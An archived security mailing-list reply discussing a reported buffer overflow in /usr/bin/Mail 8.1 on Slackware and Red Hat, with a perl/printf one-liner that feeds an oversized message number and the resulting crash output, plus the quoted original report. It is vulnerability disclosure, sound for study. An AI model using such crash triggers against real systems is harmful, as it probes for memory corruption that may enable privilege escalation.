Vulnerability Development: Re: /usr/bin/Mail buffer 0verfl0w

[BAILLEUX Christophe <cb () T-ONLINE FR>]

Arf :)

Slackware 7.1 with the good syntax :) :

[cb () tshaw]$ (printf "t " ; perl -e 'print "0" x2240' ; cat) |
/usr/bin/Mail
Mail version 8.1 6/6/93.  Type ? for help.
"/var/spool/mail/cb": 1 message 1 new
>   1 cb   Fri Mar  2 18:19  14/337   "tsss"
0: Invalid message number
"Source" stack over-pop.

[cb () thsaw]$

But /usr/bin/Mail is not suid


Redhat 6.2 :

[cb () jules cb]$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
[cb () jules cb]$ ls -l /usr/bin/Mail
lrwxrwxrwx    1 root     root           14 jui 17  2000 /usr/bin/Mail ->
../../bin/mail
[cb () jules cb]$ ls -l /bin/mail
-rwxr-xr-x    1 root     mail        62384 fv  4  2000 /bin/mail
[cb () jules cb]$

Same thing on redhat 6.2...


Regards,


> I found a buffer oveflow in /usr/bin/Mail,it's suid by default on my
> Slakware 7.00  K2.2.13
> This is the problem:
>
> SunsetZer0:#Mail
> Mail version 8.1 6/6/93.      Type ? for help
> "/var/spool/mail/root":           2  messages  2  unread
> > U  1  root                                   Thu Sep  15  02:23    33/1257
> "hole in /usr/bin/Mail"
>   U  2  sospiro                               Sat Oct    9  18:19  126/6192
> "Owned!Owned!"
> & t  0 x 2240
> 0:Invalid   message  number
> "Source"  stack  over-pop
> Segmentation Fault
>
> sospiro
>
> "ALl We WaNt is T0 bE HapPy"
> ---------------------------------